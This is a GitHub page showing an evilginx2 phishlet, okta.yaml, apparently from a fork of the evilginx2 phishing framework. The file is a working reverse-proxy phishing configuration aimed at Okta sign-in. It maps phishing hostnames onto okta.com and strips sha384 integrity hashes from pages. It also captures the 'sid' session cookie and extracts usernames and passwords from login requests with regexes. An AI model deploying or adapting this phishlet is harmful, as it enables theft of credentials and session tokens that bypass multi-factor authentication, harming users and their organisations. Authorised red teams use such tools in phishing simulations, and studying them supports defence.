forked from kgretzky/evilginx2
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathokta.yaml
23 lines (23 loc) · 782 Bytes
/
okta.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
author: '@mikesiegel'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false}
- {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false }
- {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
sub_filters:
- {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384-.{64}', replace: '', mimes: ['text/html']}
auth_tokens:
- domain: 'EXAMPLE.okta.com'
keys: ['sid']
credentials:
username:
key: ''
search: '"username":"([^"]*)'
type: 'json'
password:
key: ''
search: '"password":"([^"]*)'
type: 'json'
login:
domain: 'EXAMPLE.okta.com'
path: '/login/login.htm'